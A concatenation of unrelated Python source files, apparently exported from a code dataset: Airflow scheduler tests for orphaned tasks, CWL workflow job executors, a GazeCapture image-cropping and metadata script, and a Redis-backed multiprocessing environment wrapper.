session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEqual(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
executors.py
|
# -*- coding: utf-8 -*-
""" Single and multi-threaded executors."""
import datetime
import logging
import os
import tempfile
import threading
from abc import ABCMeta, abstractmethod
from threading import Lock
from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union
import psutil
from schema_salad.validate import ValidationException
from .command_line_tool import CallbackJob
from .context import RuntimeContext, getdefault
from .errors import WorkflowException
from .job import JobBase
from .loghandler import _logger
from .mutation import MutationManager
from .process import Process, cleanIntermediate, relocateOutputs
from .provenance import ProvenanceProfile
from .utils import DEFAULT_TMP_PREFIX
from .workflow import Workflow, WorkflowJob, WorkflowJobStep
TMPDIR_LOCK = Lock()
class JobExecutor(object, metaclass=ABCMeta):
"""Abstract base job executor."""
def __init__(self):
# type: (...) -> None
"""Initialize."""
self.final_output = (
[]
) # type: List[Union[Dict[str, Any], List[Dict[str, Any]]]]
self.final_status = [] # type: List[str]
self.output_dirs = set() # type: Set[str]
def __call__(self, *args, **kwargs): # type: (*Any, **Any) -> Any
return self.execute(*args, **kwargs)
def output_callback(self, out: Dict[str, Any], process_status: str) -> None:
"""Collect the final status and outputs."""
self.final_status.append(process_status)
self.final_output.append(out)
@abstractmethod
def run_jobs(
self,
process: Process,
job_order_object: Dict[str, Any],
logger: logging.Logger,
runtime_context: RuntimeContext,
) -> None:
"""Execute the jobs for the given Process."""
def execute(
self,
process, # type: Process
job_order_object, # type: Dict[str, Any]
runtime_context, # type: RuntimeContext
logger=_logger, # type: logging.Logger
): # type: (...) -> Tuple[Optional[Union[Dict[str, Any], List[Dict[str, Any]]]], str]
"""Execute the process."""
if not runtime_context.basedir:
raise WorkflowException("Must provide 'basedir' in runtimeContext")
finaloutdir = None # Type: Optional[str]
original_outdir = runtime_context.outdir
if isinstance(original_outdir, str):
finaloutdir = os.path.abspath(original_outdir)
runtime_context = runtime_context.copy()
outdir = tempfile.mkdtemp(
prefix=getdefault(runtime_context.tmp_outdir_prefix, DEFAULT_TMP_PREFIX)
)
self.output_dirs.add(outdir)
runtime_context.outdir = outdir
runtime_context.mutation_manager = MutationManager()
runtime_context.toplevel = True
runtime_context.workflow_eval_lock = threading.Condition(threading.RLock())
job_reqs = None
if "https://w3id.org/cwl/cwl#requirements" in job_order_object:
if (
process.metadata.get("http://commonwl.org/cwltool#original_cwlVersion")
== "v1.0"
):
raise WorkflowException(
"`cwl:requirements` in the input object is not part of CWL "
"v1.0. You can adjust to use `cwltool:overrides` instead; or you "
"can set the cwlVersion to v1.1"
)
job_reqs = job_order_object["https://w3id.org/cwl/cwl#requirements"]
elif (
"cwl:defaults" in process.metadata
and "https://w3id.org/cwl/cwl#requirements"
in process.metadata["cwl:defaults"]
):
if (
process.metadata.get("http://commonwl.org/cwltool#original_cwlVersion")
== "v1.0"
):
raise WorkflowException(
"`cwl:requirements` in the input object is not part of CWL "
"v1.0. You can adjust to use `cwltool:overrides` instead; or you "
"can set the cwlVersion to v1.1"
)
job_reqs = process.metadata["cwl:defaults"][
"https://w3id.org/cwl/cwl#requirements"
]
if job_reqs is not None:
for req in job_reqs:
process.requirements.append(req)
self.run_jobs(process, job_order_object, logger, runtime_context)
if (
self.final_output
and self.final_output[0] is not None
and finaloutdir is not None
):
self.final_output[0] = relocateOutputs(
self.final_output[0],
finaloutdir,
self.output_dirs,
runtime_context.move_outputs,
runtime_context.make_fs_access(""),
getdefault(runtime_context.compute_checksum, True),
path_mapper=runtime_context.path_mapper,
)
if runtime_context.rm_tmpdir:
if runtime_context.cachedir is None:
output_dirs = self.output_dirs # type: Iterable[Any]
else:
output_dirs = filter(
lambda x: not x.startswith(runtime_context.cachedir),
self.output_dirs,
)
cleanIntermediate(output_dirs)
if self.final_output and self.final_status:
if (
runtime_context.research_obj is not None
and isinstance(
process, (JobBase, Process, WorkflowJobStep, WorkflowJob)
)
and process.parent_wf
):
process_run_id = None
name = "primary"
process.parent_wf.generate_output_prov(
self.final_output[0], process_run_id, name
)
process.parent_wf.document.wasEndedBy(
process.parent_wf.workflow_run_uri,
None,
process.parent_wf.engine_uuid,
datetime.datetime.now(),
)
process.parent_wf.finalize_prov_profile(name=None)
return (self.final_output[0], self.final_status[0])
return (None, "permanentFail")
class SingleJobExecutor(JobExecutor):
"""Default single-threaded CWL reference executor."""
def run_jobs(
self,
process, # type: Process
job_order_object, # type: Dict[str, Any]
logger, # type: logging.Logger
runtime_context, # type: RuntimeContext
): # type: (...) -> None
process_run_id = None # type: Optional[str]
# define provenance profile for single commandline tool
if (
not isinstance(process, Workflow)
and runtime_context.research_obj is not None
):
process.provenance_object = ProvenanceProfile(
runtime_context.research_obj,
full_name=runtime_context.cwl_full_name,
host_provenance=False,
user_provenance=False,
orcid=runtime_context.orcid,
# single tool execution, so RO UUID = wf UUID = tool UUID
run_uuid=runtime_context.research_obj.ro_uuid,
fsaccess=runtime_context.make_fs_access(""),
)
process.parent_wf = process.provenance_object
jobiter = process.job(job_order_object, self.output_callback, runtime_context)
try:
for job in jobiter:
if job is not None:
if runtime_context.builder is not None:
job.builder = runtime_context.builder
if job.outdir is not None:
self.output_dirs.add(job.outdir)
if runtime_context.research_obj is not None:
if not isinstance(process, Workflow):
prov_obj = process.provenance_object
else:
prov_obj = job.prov_obj
if prov_obj:
runtime_context.prov_obj = prov_obj
prov_obj.fsaccess = runtime_context.make_fs_access("")
prov_obj.evaluate(
process,
job,
job_order_object,
runtime_context.research_obj,
)
process_run_id = prov_obj.record_process_start(process, job)
runtime_context = runtime_context.copy()
runtime_context.process_run_id = process_run_id
job.run(runtime_context)
else:
logger.error("Workflow cannot make any more progress.")
break
except (
ValidationException,
WorkflowException,
): # pylint: disable=try-except-raise
raise
except Exception as err:
logger.exception("Got workflow error")
raise WorkflowException(str(err)) from err
class MultithreadedJobExecutor(JobExecutor):
"""
Experimental multi-threaded CWL executor.
Does simple resource accounting, will not start a job unless it
has cores / ram available, but does not make any attempt to
optimize usage.
"""
def __init__(self): # type: () -> None
"""Initialize."""
super(MultithreadedJobExecutor, self).__init__()
self.threads = set() # type: Set[threading.Thread]
self.exceptions = [] # type: List[WorkflowException]
self.pending_jobs = [] # type: List[Union[JobBase, WorkflowJob]]
self.pending_jobs_lock = threading.Lock()
self.max_ram = int(psutil.virtual_memory().available / 2 ** 20)
self.max_cores = psutil.cpu_count()
self.allocated_ram = 0
self.allocated_cores = 0
def select_resources(
self, request, runtime_context
): # pylint: disable=unused-argument
# type: (Dict[str, int], RuntimeContext) -> Dict[str, int]
"""Naïve check for available cpu cores and memory."""
result = {} # type: Dict[str, int]
maxrsc = {"cores": self.max_cores, "ram": self.max_ram}
for rsc in ("cores", "ram"):
if request[rsc + "Min"] > maxrsc[rsc]:
raise WorkflowException(
"Requested at least %d %s but only %d available"
% (request[rsc + "Min"], rsc, maxrsc[rsc])
)
if request[rsc + "Max"] < maxrsc[rsc]:
result[rsc] = request[rsc + "Max"]
else:
result[rsc] = maxrsc[rsc]
return result
def _runner(self, job, runtime_context, TMPDIR_LOCK):
# type: (Union[JobBase, WorkflowJob, CallbackJob], RuntimeContext, threading.Lock) -> None
"""Job running thread."""
try:
_logger.debug(
"job: {}, runtime_context: {}, TMPDIR_LOCK: {}".format(
job, runtime_context, TMPDIR_LOCK
)
)
job.run(runtime_context, TMPDIR_LOCK)
except WorkflowException as err:
_logger.exception("Got workflow error")
self.exceptions.append(err)
except Exception as err: # pylint: disable=broad-except
_logger.exception("Got workflow error")
self.exceptions.append(WorkflowException(str(err)))
finally:
if runtime_context.workflow_eval_lock:
with runtime_context.workflow_eval_lock:
self.threads.remove(threading.current_thread())
if isinstance(job, JobBase):
self.allocated_ram -= job.builder.resources["ram"]
self.allocated_cores -= job.builder.resources["cores"]
runtime_context.workflow_eval_lock.notifyAll()
def run_job(
self,
job, # type: Union[JobBase, WorkflowJob, None]
runtime_context, # type: RuntimeContext
): # type: (...) -> None
"""Execute a single Job in a seperate thread."""
if job is not None:
with self.pending_jobs_lock:
self.pending_jobs.append(job)
with self.pending_jobs_lock:
n = 0
while (n + 1) <= len(self.pending_jobs):
job = self.pending_jobs[n]
if isinstance(job, JobBase):
if (job.builder.resources["ram"]) > self.max_ram or (
job.builder.resources["cores"]
) > self.max_cores:
_logger.error(
'Job "%s" cannot be run, requests more resources (%s) '
"than available on this host (max ram %d, max cores %d",
job.name,
job.builder.resources,
self.allocated_ram,
self.allocated_cores,
self.max_ram,
self.max_cores,
)
self.pending_jobs.remove(job)
return
if (
(self.allocated_ram + job.builder.resources["ram"])
> self.max_ram
or (self.allocated_cores + job.builder.resources["cores"])
> self.max_cores
):
_logger.debug(
'Job "%s" cannot run yet, resources (%s) are not '
"available (already allocated ram is %d, allocated cores is %d, "
"max ram %d, max cores %d",
job.name,
job.builder.resources,
self.allocated_ram,
self.allocated_cores,
self.max_ram,
self.max_cores,
)
n += 1
continue
thread = threading.Thread(
target=self._runner, args=(job, runtime_context, TMPDIR_LOCK)
)
thread.daemon = True
self.threads.add(thread)
if isinstance(job, JobBase):
self.allocated_ram += job.builder.resources["ram"]
self.allocated_cores += job.builder.resources["cores"]
thread.start()
self.pending_jobs.remove(job)
def wait_for_next_completion(self, runtime_context):
# type: (RuntimeContext) -> None
"""Wait for jobs to finish."""
if runtime_context.workflow_eval_lock is not None:
runtime_context.workflow_eval_lock.wait()
if self.exceptions:
raise self.exceptions[0]
def run_jobs(
self,
process, # type: Process
job_order_object, # type: Dict[str, Any]
logger, # type: logging.Logger
runtime_context, # type: RuntimeContext
): # type: (...) -> None
jobiter = process.job(job_order_object, self.output_callback, runtime_context)
if runtime_context.workflow_eval_lock is None:
raise WorkflowException(
"runtimeContext.workflow_eval_lock must not be None"
)
runtime_context.workflow_eval_lock.acquire()
for job in jobiter:
if job is not None:
if isinstance(job, JobBase):
job.builder = runtime_context.builder or job.builder
if job.outdir is not None:
self.output_dirs.add(job.outdir)
self.run_job(job, runtime_context)
if job is None:
if self.threads:
self.wait_for_next_completion(runtime_context)
else:
logger.error("Workflow cannot make any more progress.")
break
self.run_job(None, runtime_context)
while self.threads:
self.wait_for_next_completion(runtime_context)
self.run_job(None, runtime_context)
runtime_context.workflow_eval_lock.release()
|
prepareDataset-checkpoint.py
|
import math, shutil, os, time, argparse, json, re, sys
import numpy as np
import scipy.io as sio
from PIL import Image
import multiprocessing
from multiprocessing import Queue
from operator import itemgetter
import pprint as pp
'''
Prepares the GazeCapture dataset for use with the pytorch code. Crops images, compiles JSONs into metadata.mat
Author: Petr Kellnhofer ( pkel_lnho (at) gmai_l.com // remove underscores and spaces), 2018.
Website: http://gazecapture.csail.mit.edu/
Cite:
Eye Tracking for Everyone
K.Krafka*, A. Khosla*, P. Kellnhofer, H. Kannan, S. Bhandarkar, W. Matusik and A. Torralba
IEEE Conference on Computer Vision and Pattern Recognition (CVPR), 2016
@inproceedings{cvpr2016_gazecapture,
Author = {Kyle Krafka and Aditya Khosla and Petr Kellnhofer and Harini Kannan and Suchendra Bhandarkar and Wojciech Matusik and Antonio Torralba},
Title = {Eye Tracking for Everyone},
Year = {2016},
Booktitle = {IEEE Conference on Computer Vision and Pattern Recognition (CVPR)}
}
'''
parser = argparse.ArgumentParser(description='iTracker-pytorch-PrepareDataset.')
parser.add_argument('--dataset_path', help="Path to extracted files. It should have folders called '%%05d' in it.")
parser.add_argument('--output_path', default=None, help="Where to write the output. Can be the same as dataset_path if you wish (=default).")
args = parser.parse_args()
g_meta_queue = Queue()
g_meta_list = []
g_meta = {
'labelRecNum': [],
'frameIndex': [],
'labelDotXCam': [],
'labelDotYCam': [],
'labelFaceGrid': [],
}
def process_recording(recordings, thread_id):
# Output structure
meta = {
'labelRecNum': [],
'frameIndex': [],
'labelDotXCam': [],
'labelDotYCam': [],
'labelFaceGrid': [],
}
for i,recording in enumerate(recordings):
print('[%d/%d] Thread %d Processing recording %s (%.2f%%)' % (i, len(recordings), thread_id, recording, i / len(recordings) * 100))
recDir = os.path.join(args.dataset_path, recording)
recDirOut = os.path.join(args.output_path, recording)
# Read JSONs
appleFace = readJson(os.path.join(recDir, 'appleFace.json'))
if appleFace is None:
continue
appleLeftEye = readJson(os.path.join(recDir, 'appleLeftEye.json'))
if appleLeftEye is None:
continue
appleRightEye = readJson(os.path.join(recDir, 'appleRightEye.json'))
if appleRightEye is None:
continue
dotInfo = readJson(os.path.join(recDir, 'dotInfo.json'))
if dotInfo is None:
continue
faceGrid = readJson(os.path.join(recDir, 'faceGrid.json'))
if faceGrid is None:
continue
frames = readJson(os.path.join(recDir, 'frames.json'))
if frames is None:
continue
# info = readJson(os.path.join(recDir, 'info.json'))
# if info is None:
# continue
# screen = readJson(os.path.join(recDir, 'screen.json'))
# if screen is None:
# continue
facePath = preparePath(os.path.join(recDirOut, 'appleFace'))
leftEyePath = preparePath(os.path.join(recDirOut, 'appleLeftEye'))
rightEyePath = preparePath(os.path.join(recDirOut, 'appleRightEye'))
# Preprocess
allValid = np.logical_and(np.logical_and(appleFace['IsValid'], appleLeftEye['IsValid']), np.logical_and(appleRightEye['IsValid'], faceGrid['IsValid']))
if not np.any(allValid):
continue
frames = np.array([int(re.match('(\d{5})\.jpg$', x).group(1)) for x in frames])
bboxFromJson = lambda data: np.stack((data['X'], data['Y'], data['W'],data['H']), axis=1).astype(int)
faceBbox = bboxFromJson(appleFace) + [-1,-1,1,1] # for compatibility with matlab code
leftEyeBbox = bboxFromJson(appleLeftEye) + [0,-1,0,0]
rightEyeBbox = bboxFromJson(appleRightEye) + [0,-1,0,0]
leftEyeBbox[:,:2] += faceBbox[:,:2] # relative to face
rightEyeBbox[:,:2] += faceBbox[:,:2]
faceGridBbox = bboxFromJson(faceGrid)
for j,frame in enumerate(frames):
# Can we use it?
if not allValid[j]:
continue
# Load image
imgFile = os.path.join(recDir, 'frames', '%05d.jpg' % frame)
if not os.path.isfile(imgFile):
logError('Warning: Could not read image file %s!' % imgFile)
continue
img = Image.open(imgFile)
if img is None:
logError('Warning: Could not read image file %s!' % imgFile)
continue
img = np.array(img.convert('RGB'))
# Crop images
imFace = cropImage(img, faceBbox[j,:])
imEyeL = cropImage(img, leftEyeBbox[j,:])
imEyeR = cropImage(img, rightEyeBbox[j,:])
# Save images
Image.fromarray(imFace).save(os.path.join(facePath, '%05d.jpg' % frame), quality=95)
Image.fromarray(imEyeL).save(os.path.join(leftEyePath, '%05d.jpg' % frame), quality=95)
Image.fromarray(imEyeR).save(os.path.join(rightEyePath, '%05d.jpg' % frame), quality=95)
# Collect metadata
meta['labelRecNum'] += [int(recording)]
meta['frameIndex'] += [frame]
meta['labelDotXCam'] += [dotInfo['XCam'][j]]
meta['labelDotYCam'] += [dotInfo['YCam'][j]]
meta['labelFaceGrid'] += [faceGridBbox[j,:]]
return meta
def run_process(thread_id, name, recordings):
print("Starting " + name)
meta = process_recording(recordings, thread_id)
meta_tup = (thread_id, meta) # Tuple so we can sort later on
# Add to global thread-safe queue
g_meta_queue.put(meta_tup)
print("{} finished. Processed {} recordings".format(name, len(recordings)))
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
def split(a, n):
k, m = divmod(len(a), n)
return (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n))
def main():
if args.output_path is None:
args.output_path = args.dataset_path
if args.dataset_path is None or not os.path.isdir(args.dataset_path):
raise RuntimeError('No such dataset folder %s!' % args.dataset_path)
preparePath(args.output_path)
# list recordings
recordings = os.listdir(args.dataset_path)
recordings = np.array(recordings, np.object)
recordings = recordings[[os.path.isdir(os.path.join(args.dataset_path, r)) for r in recordings]]
recordings.sort()
NUM_THREADS = 15
# num_recordings = len(recordings)
# Max number of recordings a thread can have.
# Thus, (N-1) threads will have M recordings each. The last thread will have the remainder.
# max_recordings_per_thread = math.ceil(num_recordings/NUM_THREADS)
# Split recordings into approximately equal sized chunks for each thread
chunked_recordings = list(split(recordings, NUM_THREADS))
processes = []
pp.pprint(chunked_recordings)
num_processes = 0
for i,recording in enumerate(chunked_recordings):
# Start parallel processes
name = "Thread " + str(i)
p = multiprocessing.Process(target=run_process, args=(i, name, recording))
processes.append((i, p))
p.start()
num_processes += 1
meta_list = []
num_processes_remaining = int(num_processes)
while num_processes_remaining > 0:
while not g_meta_queue.empty():
meta_list.append(g_meta_queue.get())
num_processes_remaining -= 1
print("{} processes remaining".format(num_processes_remaining))
time.sleep(5)
for p_tup in processes:
p_id, p = p_tup
# Join processes
p.join()
print("Joined process {}".format(p_id))
# Sort meta_list in order of thread id (so lower thread num comes first)
meta_list.sort(key=itemgetter(0))
for item in meta_list:
thread_id, meta = item
for key in meta:
g_meta[key] += meta[key]
print("Created g_meta database")
# Integrate
g_meta['labelRecNum'] = np.stack(g_meta['labelRecNum'], axis = 0).astype(np.int16)
g_meta['frameIndex'] = np.stack(g_meta['frameIndex'], axis = 0).astype(np.int32)
g_meta['labelDotXCam'] = np.stack(g_meta['labelDotXCam'], axis = 0)
g_meta['labelDotYCam'] = np.stack(g_meta['labelDotYCam'], axis = 0)
g_meta['labelFaceGrid'] = np.stack(g_meta['labelFaceGrid'], axis = 0).astype(np.uint8)
# Load reference metadata
print('Will compare to the reference GitHub dataset metadata.mat...')
reference = sio.loadmat('./reference_metadata.mat', struct_as_record=False)
reference['labelRecNum'] = reference['labelRecNum'].flatten()
reference['frameIndex'] = reference['frameIndex'].flatten()
reference['labelDotXCam'] = reference['labelDotXCam'].flatten()
reference['labelDotYCam'] = reference['labelDotYCam'].flatten()
reference['labelTrain'] = reference['labelTrain'].flatten()
reference['labelVal'] = reference['labelVal'].flatten()
reference['labelTest'] = reference['labelTest'].flatten()
# Find mapping
mKey = np.array(['%05d_%05d' % (rec, frame) for rec, frame in zip(g_meta['labelRecNum'], g_meta['frameIndex'])], np.object)
rKey = np.array(['%05d_%05d' % (rec, frame) for rec, frame in zip(reference['labelRecNum'], reference['frameIndex'])], np.object)
mIndex = {k: i for i,k in enumerate(mKey)}
rIndex = {k: i for i,k in enumerate(rKey)}
mToR = np.zeros((len(mKey,)),int) - 1
for i,k in enumerate(mKey):
if k in rIndex:
mToR[i] = rIndex[k]
else:
logError('Did not find rec_frame %s from the new dataset in the reference dataset!' % k)
rToM = np.zeros((len(rKey,)),int) - 1
for i,k in enumerate(rKey):
if k in mIndex:
rToM[i] = mIndex[k]
else:
logError('Did not find rec_frame %s from the reference dataset in the new dataset!' % k, critical = False)
#break
# Copy split from reference
g_meta['labelTrain'] = np.zeros((len(g_meta['labelRecNum'],)),np.bool)
g_meta['labelVal'] = np.ones((len(g_meta['labelRecNum'],)),np.bool) # default choice
g_meta['labelTest'] = np.zeros((len(g_meta['labelRecNum'],)),np.bool)
validMappingMask = mToR >= 0
g_meta['labelTrain'][validMappingMask] = reference['labelTrain'][mToR[validMappingMask]]
g_meta['labelVal'][validMappingMask] = reference['labelVal'][mToR[validMappingMask]]
g_meta['labelTest'][validMappingMask] = reference['labelTest'][mToR[validMappingMask]]
# Write out metadata
metaFile = os.path.join(args.output_path, 'metadata.mat')
print('Writing out the metadata.mat to %s...' % metaFile)
sio.savemat(metaFile, g_meta)
# Statistics
nMissing = np.sum(rToM < 0)
nExtra = np.sum(mToR < 0)
totalMatch = len(mKey) == len(rKey) and np.all(np.equal(mKey, rKey))
print('======================\n\tSummary\n======================')
print('Total added %d frames from %d recordings.' % (len(g_meta['frameIndex']), len(np.unique(g_meta['labelRecNum']))))
if nMissing > 0:
print('There are %d frames missing in the new dataset. This may affect the results. Check the log to see which files are missing.' % nMissing)
else:
print('There are no missing files.')
if nExtra > 0:
print('There are %d extra frames in the new dataset. This is generally ok as they were marked for validation split only.' % nExtra)
else:
print('There are no extra files that were not in the reference dataset.')
if totalMatch:
print('The new metadata.mat is an exact match to the reference from GitHub (including ordering)')
#import pdb; pdb.set_trace()
input("Press Enter to continue...")
def readJson(filename):
if not os.path.isfile(filename):
logError('Warning: No such file %s!' % filename)
return None
with open(filename) as f:
try:
data = json.load(f)
except:
data = None
if data is None:
logError('Warning: Could not read file %s!' % filename)
return None
return data
def preparePath(path, clear = False):
if not os.path.isdir(path):
os.makedirs(path, 0o777)
if clear:
files = os.listdir(path)
for f in files:
fPath = os.path.join(path, f)
if os.path.isdir(fPath):
shutil.rmtree(fPath)
else:
os.remove(fPath)
return path
def logError(msg, critical = False):
print(msg)
if critical:
sys.exit(1)
def cropImage(img, bbox):
bbox = np.array(bbox, int)
aSrc = np.maximum(bbox[:2], 0)
bSrc = np.minimum(bbox[:2] + bbox[2:], (img.shape[1], img.shape[0]))
aDst = aSrc - bbox[:2]
bDst = aDst + (bSrc - aSrc)
res = np.zeros((bbox[3], bbox[2], img.shape[2]), img.dtype)
res[aDst[1]:bDst[1],aDst[0]:bDst[0],:] = img[aSrc[1]:bSrc[1],aSrc[0]:bSrc[0],:]
return res
if __name__ == "__main__":
main()
print('DONE')
|
vec_env.py
|
import redis
import time
import subprocess
from multiprocessing import Process, Pipe
class VecEnv:
def __init__(self, num_envs, env, openie_path):
self.conn_valid = redis.Redis(host='localhost', port=6381, db=0)
self.closed = False
self.total_steps = 0
self.num_envs = num_envs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(num_envs)])
self.ps = [Process(target=worker, args=(work_remote, remote, env))
for (work_remote, remote) in zip(self.work_remotes, self.remotes)]
for p in self.ps:
# if the main process crashes, we should not cause things to hang
p.daemon = True
p.start()
for remote in self.work_remotes:
remote.close()
def step(self, actions):
if self.total_steps % 1024 == 0:
self.conn_valid.flushdb()
self.total_steps += 1
self._assert_not_closed()
assert len(actions) == self.num_envs, "Error: incorrect number of actions."
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
results = [remote.recv() for remote in self.remotes]
self.waiting = False
return zip(*results)
def reset(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(('reset', None))
results = [remote.recv() for remote in self.remotes]
return zip(*results)
def close_extras(self):
self.closed = True
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
def _assert_not_closed(self):
assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"
# Used in VecEnv
def worker(remote, parent_remote, env):
parent_remote.close()
env.create()
try:
done = False
while True:
cmd, data = remote.recv()
if cmd == 'step':
if done:
ob, info, graph_info = env.reset()
rew = 0
done = False
else:
ob, rew, done, info, graph_info = env.step(data)
remote.send((ob, rew, done, info, graph_info))
elif cmd == 'reset':
ob, info, graph_info = env.reset()
remote.send((ob, info, graph_info))
elif cmd == 'close':
env.close()
break
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.